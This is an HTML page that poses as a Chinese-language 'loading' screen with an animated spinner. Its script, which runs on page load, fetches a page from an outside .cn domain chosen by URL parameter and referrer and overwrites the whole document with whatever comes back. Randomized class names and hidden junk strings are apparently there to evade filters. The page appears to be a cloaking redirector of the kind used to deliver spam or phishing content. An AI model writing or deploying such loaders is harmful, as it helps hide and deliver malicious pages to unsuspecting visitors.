<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Q0u3PQRAw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Q0u3PQRAw .l8rPO2N {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Q0u3PQRAw .content {
            line-height: 50px;
            text-align: center
        }

        .Q0u3PQRAw .img {
            width: 100%
        }

        .Q0u3PQRAw .RkAhEbA6bT {
            text-align: center
        }

        .Q0u3PQRAw .RkAhEbA6bT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Q0u3PQRAw .RkAhEbA6bT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Q0u3PQRAw .RkAhEbA6bT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Q0u3PQRAw .RkAhEbA6bT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Q0u3PQRAw .RkAhEbA6bT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Q0u3PQRAw .RkAhEbA6bT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Q0u3PQRAw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function e8LqRRy1yi(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var uC7IX4 = e8LqRRy1yi('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ uC7IX4 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ uC7IX4 +".html?a=share";
		}
		
        ugwxqSK=url+"#"+new Date().getTime();
        ugwxqSK && function() {
            $.get(ugwxqSK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<ul style='display:none' >dZVowTBkCHme4tojnAAkivXBpw5UigYfwj1XXtKG6f54rggS6b</ul>
<a  href='#' style='display:none'>Fb9vNSkmJvvDfdCnL9iSOj8RDVGC</a>
<h1 style='display:none' >zga0tsaE9TqUwYA84onaXb2UqakrkSvPZgjdnhAm83uuonS1QMEgz9sPv3r2CXvcPgIdcHpNurPNn8hVIRhaeOGWDANqQOC1</h1>
<a  href='#' style='display:none'>Fb9vNSkmJvvDfdCnL9iSOj8RDVGC</a>
<h1 style='display:none' >zga0tsaE9TqUwYA84onaXb2UqakrkSvPZgjdnhAm83uuonS1QMEgz9sPv3r2CXvcPgIdcHpNurPNn8hVIRhaeOGWDANqQOC1</h1>
<div style='display:none'>suqJLoHdhaPy3ESbu2iRi8Zr</div><div class="Q0u3PQRAw">
    <div class="l8rPO2N">
        <div class="RkAhEbA6bT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >AVvwaRKj8BAsqiaiAqOxwPfIxHApKuq8EGwqi7tmQ3KsaudnGKTJ8FYfEKtAHbvauaSCwzsnlEB4BEbrCoIwy1QQDdLZD7L563A</b>
<img  src='' style='display:none'>
<span style='display:none'>TTh9xd9dP9YajtrfWpTPjN3Wg0xBH2saPC9KqF5bVP86Dt</span>
<ul style='display:none' >B7MSZQ4k9D86mZrdqddETOtRZclUy92glwKIP4m5OVC0ja3cEWcA2jrzluapvQLJNrF5gy7UTPKS1AtdhpTV7ttj7cBc2gXpM6zx7</ul>
<img  src='' style='display:none'></body>
</html>